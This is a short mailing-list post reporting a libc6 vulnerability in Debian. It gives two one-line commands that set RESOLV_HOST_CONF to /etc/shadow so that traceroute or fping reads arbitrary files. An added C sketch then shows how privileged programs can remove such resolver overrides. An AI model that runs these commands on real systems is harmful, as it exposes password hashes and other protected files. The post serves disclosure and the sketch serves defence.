libc6 vulnerability
Folks:
When checking the security of my system, I found that it is vulnerable
to the following standard attack (in tcsh syntax):
    env RESOLV_HOST_CONF=/etc/shadow /usr/sbin/traceroute foobar
or
    env RESOLV_HOST_CONF=/etc/shadow fping foobar
This allows the user to read any (text) file on the system. My system
has:
netstd 3.07-7.1
libc6 2.0.105-1.2
In other words, it is up to date according to ftp.debian.org.
Curiously, my older 486 system at home is not vulnerable to these attacks.
--Paul Vojta, vojta@math.berkeley.edu
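
Added example, not part of the original post and not libc's or netstd's own code: a defensive sketch of how a program that runs with more privilege than its invoker can drop caller-supplied resolver overrides such as RESOLV_HOST_CONF before any name lookup. It assumes the affected binaries run set-uid; the function names and the variables in the list other than RESOLV_HOST_CONF are this example's choices.

```c
#include <stdlib.h>
#include <stddef.h>
#include <sys/types.h>
#include <unistd.h>

/* Resolver-related variables an unprivileged caller must not control.
 * RESOLV_HOST_CONF is the one from the post; the others are standard
 * resolver overrides added here as an assumption of this example. */
static const char *const unsafe_vars[] = {
    "RESOLV_HOST_CONF", "HOSTALIASES", "LOCALDOMAIN", "RES_OPTIONS", NULL
};

/* True when real and effective ids differ, i.e. the process was started
 * set-uid or set-gid and holds privilege its invoker does not. */
int runs_privileged(uid_t ruid, uid_t euid, gid_t rgid, gid_t egid)
{
    return ruid != euid || rgid != egid;
}

/* Remove the overrides when privileged.
 * Returns the number of variables removed, or -1 on failure. */
int scrub_resolver_env(int privileged)
{
    int removed = 0;

    if (!privileged)
        return 0;               /* ordinary process: leave environment alone */

    for (size_t i = 0; unsafe_vars[i] != NULL; i++) {
        if (getenv(unsafe_vars[i]) == NULL)
            continue;
        if (unsetenv(unsafe_vars[i]) != 0)
            return -1;          /* fail closed: caller should abort */
        removed++;
    }
    return removed;
}

int main(void)
{
    int priv = runs_privileged(getuid(), geteuid(), getgid(), getegid());

    if (scrub_resolver_env(priv) < 0)
        return 1;               /* refuse to continue with a tainted env */
    /* Only after this point is it safe to call into the resolver. */
    return 0;
}
```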